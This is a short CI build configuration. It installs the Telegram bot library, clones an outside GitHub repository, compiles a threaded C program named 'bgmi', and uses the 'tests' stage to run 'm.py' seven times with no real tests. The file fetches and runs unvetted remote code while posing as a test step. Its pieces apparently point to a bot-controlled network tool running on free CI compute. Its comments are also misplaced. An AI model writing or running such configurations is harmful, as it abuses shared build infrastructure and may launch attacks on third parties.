build:
  environment:
    python: "pypy3.7-7.3.4"  # Use PyPy 3.7 (7.3.4)
  dependencies:
    before:
      - python3 -m ensurepip  # Ensure pip is installed for PyPy
      - python3 -m pip install --upgrade pip
      - pip install telebot
      - git clone https://github.com/nsjehwh/11.git
      - cd 11
      - gcc -o bgmi v.c -lpthread
             # Install GCC for compiling C programs
     # Compile the C program
  tests:
    override:
     
      - python3 m.py 
      - python3 m.py 
      - python3 m.py 
      - python3 m.py 
      - python3 m.py 
      - python3 m.py 
      - python3 m.py 
